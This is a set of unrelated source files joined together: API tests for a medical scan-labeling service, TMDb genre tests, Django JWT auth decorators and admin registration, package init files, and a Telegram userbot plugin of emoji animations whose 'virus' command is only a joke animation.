def test_add_chain_label(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Chain tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.CHAIN], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Chain Tool
payload = {
'elements': [{
'slice_index': 0,
'points': [
{
'x': 0.2,
'y': 0.3,
},
{
'x': 0.5,
'y': 0.8,
},
],
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.CHAIN.value,
'loop': False,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 201
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_id = json_response['label_id']
assert isinstance(label_id, str)
assert len(label_id) >= 1
# Step 4. Fetch details about above Label
response = api_client.get('/api/v1/labels/' + label_id, headers=get_headers(token=user_token))
assert response.status_code == 200
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
assert len(json_response['elements']) == 1
assert json_response['elements'][0]['points'][0]['x'] == 0.2
assert json_response['elements'][0]['points'][0]['y'] == 0.3
assert json_response['elements'][0]['points'][1]['x'] == 0.5
assert json_response['elements'][0]['points'][1]['y'] == 0.8
assert not json_response['elements'][0]['loop']
def test_add_chain_label_not_enough_points(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for rejecting a Chain tool Label that has fewer than two points."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.CHAIN], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Chain Tool
payload = {
'elements': [{
'slice_index': 0,
'points': [
{
'x': 0.2,
'y': 0.3,
},
],
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.CHAIN.value,
'loop': False,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 400
def test_add_label_with_tag_from_other_task(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label with Tag from other Task."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
left_task = TasksRepository.add_task('MARK_LEFT', 'Mark Left', 'path/to/image', ['KIDNEYS'], '', [], [])
right_task = TasksRepository.add_task('MARK_RIGHT', 'Mark Right', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('TAG_LEFT', 'Tag Left', [LabelTool.POINT], left_task.id)
LabelTagsRepository.add_new_tag('TAG_RIGHT', 'Tag Right', [LabelTool.POINT], right_task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with an element with Tag from another Task
payload = {
'elements': [{
'slice_index': 0,
'x': 0.25,
'y': 0.5,
'tag': 'TAG_RIGHT',
'tool': LabelTool.POINT.value,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_LEFT/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 400
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
assert json_response['message'] == 'Invalid arguments.'
assert json_response['details'] == 'Tag TAG_RIGHT is not part of Task MARK_LEFT.'
| 41.215613 | 110 | 0.632452 | 1,396 | 11,087 | 4.803725 | 0.101719 | 0.069788 | 0.032956 | 0.042648 | 0.848494 | 0.809126 | 0.793319 | 0.777065 | 0.770206 | 0.770206 | 0 | 0.01895 | 0.233697 | 11,087 | 268 | 111 | 41.369403 | 0.770363 | 0.087309 | 0 | 0.714953 | 0 | 0 | 0.15639 | 0.021348 | 0 | 0 | 0 | 0 | 0.17757 | 1 | 0.023364 | false | 0 | 0.03271 | 0 | 0.056075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# File: tests/methods_tests/test_genres.py (repo: lycantropos/asynctmdb, license: MIT)
import operator
import pytest
from aiohttp import ClientSession
from asynctmdb.methods import genres
from tests.utils import (is_positive_integer,
is_non_empty_string)
@pytest.mark.asyncio
async def test_movie_genres(api_base_url: str,
api_key: str,
session: ClientSession) -> None:
records = await genres.movie(api_base_url=api_base_url,
api_key=api_key,
session=session)
records_count = len(records)
records_ids = list(map(operator.itemgetter('id'), records))
records_names = list(map(operator.itemgetter('name'), records))
assert isinstance(records, list)
assert all(map(is_positive_integer, records_ids))
assert all(map(is_non_empty_string, records_names))
assert len(set(records_ids)) == records_count
assert len(set(records_names)) == records_count
@pytest.mark.asyncio
async def test_tv_genres(api_base_url: str,
api_key: str,
session: ClientSession) -> None:
records = await genres.tv(api_base_url=api_base_url,
api_key=api_key,
session=session)
records_count = len(records)
records_ids = list(map(operator.itemgetter('id'), records))
records_names = list(map(operator.itemgetter('name'), records))
assert isinstance(records, list)
assert all(map(is_positive_integer, records_ids))
assert all(map(is_non_empty_string, records_names))
assert len(set(records_ids)) == records_count
assert len(set(records_names)) == records_count
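The assertions above rely on a common idiom: extract one field per record with `operator.itemgetter`, then compare `len(set(...))` against the record count — a set collapses duplicates, so equal lengths mean every value is unique. A self-contained illustration with hypothetical genre records:

```python
import operator

# Sample records shaped like the TMDb genre responses the tests validate.
records = [{"id": 28, "name": "Action"}, {"id": 12, "name": "Adventure"}]

ids = list(map(operator.itemgetter("id"), records))
names = list(map(operator.itemgetter("name"), records))

# Equal lengths after deduplication imply uniqueness of every value.
all_ids_unique = len(set(ids)) == len(records)
all_names_unique = len(set(names)) == len(records)
```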
# File: netsuite/__init__.py (repo: fabriceb/netsuite, license: MIT)
from . import constants  # noqa
from .client import * # noqa
from .config import * # noqa
from .rest_api import * # noqa
from .restlet import * # noqa
from .soap_api import * # noqa
# File: core/decorators.py (repo: junlegend/back-landing-career, license: MIT)
import jwt
from django.http import JsonResponse
from users.models import User
from global_variable import SECRET_KEY, ALGORITHM
def login_required(func):
def wrapper(self, request, *args, **kwargs):
try:
access_token = request.headers.get('Authorization')
pay_load = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
user = User.objects.get(id=pay_load['user_id'])
request.user = user
return func(self, request, *args, **kwargs)
except jwt.InvalidTokenError:
return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)
except jwt.exceptions.DecodeError:
return JsonResponse({'message': 'DECODE_ERROR'}, status=400)
except jwt.ExpiredSignatureError:
return JsonResponse({'message': 'EXPIRED_TOKEN'}, status=401)
except User.DoesNotExist:
return JsonResponse({'message': 'USER_DOES_NOT_EXISTS'}, status=401)
except KeyError:
return JsonResponse({'message': 'KEY_ERROR'}, status=400)
return wrapper
def admin_only(func):
def wrapper(self, request, *args, **kwargs):
try:
access_token = request.headers.get('Authorization')
pay_load = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
role = pay_load['role']
user = User.objects.get(id=pay_load['user_id'])
request.user = user
if role != 'admin':
return JsonResponse({'message': 'UNAUTHORIZED'}, status=401)
return func(self, request, *args, **kwargs)
except jwt.InvalidTokenError:
return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)
except jwt.exceptions.DecodeError:
return JsonResponse({'message': 'DECODE_ERROR'}, status=400)
except jwt.ExpiredSignatureError:
return JsonResponse({'message': 'EXPIRED_TOKEN'}, status=401)
except User.DoesNotExist:
return JsonResponse({'message': 'USER_DOES_NOT_EXISTS'}, status=401)
except KeyError:
return JsonResponse({'message': 'KEY_ERROR'}, status=400)
return wrapper
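Both decorators follow the same verify-then-attach pattern: decode the token, reject it if the signature or expiry is invalid, otherwise trust the claims inside. A toy stdlib sketch of that sign/verify round trip — this is a hypothetical HMAC scheme for illustration, not PyJWT or the project's code:

```python
import base64
import hashlib
import hmac
import json

SECRET = b"demo-secret"  # hypothetical key, stands in for SECRET_KEY


def sign(payload: dict) -> str:
    """Serialize and MAC a payload (a toy stand-in for jwt.encode)."""
    body = base64.urlsafe_b64encode(json.dumps(payload).encode())
    mac = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return body.decode() + "." + mac


def verify(token: str) -> dict:
    """Reject tampered tokens, else return the claims (like jwt.decode)."""
    body, mac = token.rsplit(".", 1)
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("INVALID_TOKEN")
    return json.loads(base64.urlsafe_b64decode(body))
```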
"""
Pseudo-random generator - vlgeoff 2017
"""
from .random_string_generator import RandomStringGenerator # noqa
from .random_string_generator import RandomStringGeneratorScript # noqa
from .random_string_generator import RejectedRegex, ExhaustedGenerator # noqa
from django.contrib import admin
from .models import PinnedComment, PinnedPullRequest
admin.site.register(PinnedPullRequest)
admin.site.register(PinnedComment)
from userbot import CMD_HELP
from telethon import events
import asyncio
from userbot.utils import admin_cmd
from userbot import ALIVE_NAME
import random, re
from collections import deque
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Cat"
@borg.on(admin_cmd(pattern=f"snake$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 0.3
    animation_ttl = range(0, 27)
    await event.edit("snake..")
    animation_chars = [
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◻️◼️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 27])
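Each handler in this plugin cycles through its frame list with a hardcoded modulus (`i % 27`, `i % 16`, ...), which silently breaks if a frame is added or removed. A small hypothetical helper, not part of the plugin, that derives the modulus from the list itself:

```python
def frame_at(frames, i):
    """Return the i-th animation frame, wrapping around the list."""
    # len(frames) keeps the modulus in sync with the list, unlike a
    # hardcoded constant that must be updated whenever frames change.
    return frames[i % len(frames)]
```

With it, each loop body could simply be `await event.edit(frame_at(animation_chars, i))` regardless of how many frames the handler defines.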
@borg.on(admin_cmd(pattern=f"human$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 0.5
    animation_ttl = range(0, 16)
    await event.edit("human...")
    animation_chars = [
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛🚗\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛🚗⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛🚗⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🚗⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛🚗⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛🚗⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n🚗⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜😊⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬛⬜⬛\n⬛⬛⬜⬛⬛⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬛⬛⬛⬛⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬛😊⬛⬜⬛\n⬛⬛⬜⬜⬜⬛⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬛⬛⬛⬛⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬛⬜⬜⬜⬛⬛\n⬛⬜⬛⬜⬛⬜⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜😊⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 16])
@borg.on(admin_cmd(pattern=f"mc$", outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 0.3
    animation_ttl = range(0, 28)
    await event.edit("mc..")
    animation_chars = [
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◻️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◻️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◻️◼️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◻️",
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◼️◼️◼️◼️◼️\n◼️◻️◼️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◻️◻️◻️◼️\n◼️◼️◼️◼️◼️"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 28])
@borg.on(admin_cmd(pattern="virus$"))
async def _(event):
    if event.fwd_from:
        return
    animation_interval = 1
    animation_ttl = range(0, 30)
    await event.edit("Injecting virus....")
    animation_chars = [
"🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
"◼️🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎\n🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎🔴🔵🌕♓♎⛎",
